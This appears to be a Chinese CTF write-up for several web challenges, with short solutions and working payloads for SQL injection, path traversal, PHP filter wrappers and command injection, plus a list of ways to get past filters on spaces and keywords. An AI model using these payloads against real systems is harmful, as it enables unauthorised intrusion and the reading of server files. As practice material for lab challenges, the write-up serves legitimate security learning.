[极客大挑战 2019]EasySQL1
进入题目后,首先使用弱口令admin判断
发现不是弱口令,再尝试使用万能密码
1'or 1=1#
即可得到flag
[极客大挑战 2019]Havefun
进入源码查看
发现注释掉的内容
根据提示,令
?cat=dog
即可得到flag
[HCTF 2018]WarmUp
老样子,先看源码
发现注释掉一个php
访问那个php
得到并分析php代码
?file=hint.php
得到
我们可以得到ffffllllaaaagggg肯定不在当前目录,一般情况下,在上四级或五级目录
那么就可以构造payload,
?file=hint.php?../../../../../ffffllllaaaagggg
得出flag
[ACTF2020 新生赛]Include
源码没什么特别的,试试抓个包
抓包之后也没有什么特别的
那再试试伪协议
?file=php://filter/convert.base64-encode/resource=flag.php
得到一串base64编码
解码,即可得到flag
[ACTF2020 新生赛]Exec
首先ping一个随即地址试试
接下来就要看看他哪些被过滤掉,哪些没有过滤掉
试试ls能不能出目录
发现出来了一个index.php
然后得出;没被过滤,接下来遍历目录
看到flag文件,cat flag,就能得到flag
[GXYCTF2019]Ping Ping Ping
根据题目提示,这道题还是ping的题
ping一下ls
当我们cat flag.php发现
发现有过滤
猜测是cat
可替换cat的有
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行 t
ac:从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看file -f:报错出具体内容 grep
修改后
还是被过滤,可以确定空格被过滤了
${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS
<
<>
{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来
%20 (space)
%09 (tab)
X=$'cat\x09./flag.php';$X (\x09表示tab,也可以用\x20)
替换后得到
访问不成,那就不访问flag了,先看看index里过滤了什么吧
通过看源码,我们可以得到
用替换法去做
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
查看源码就得到flag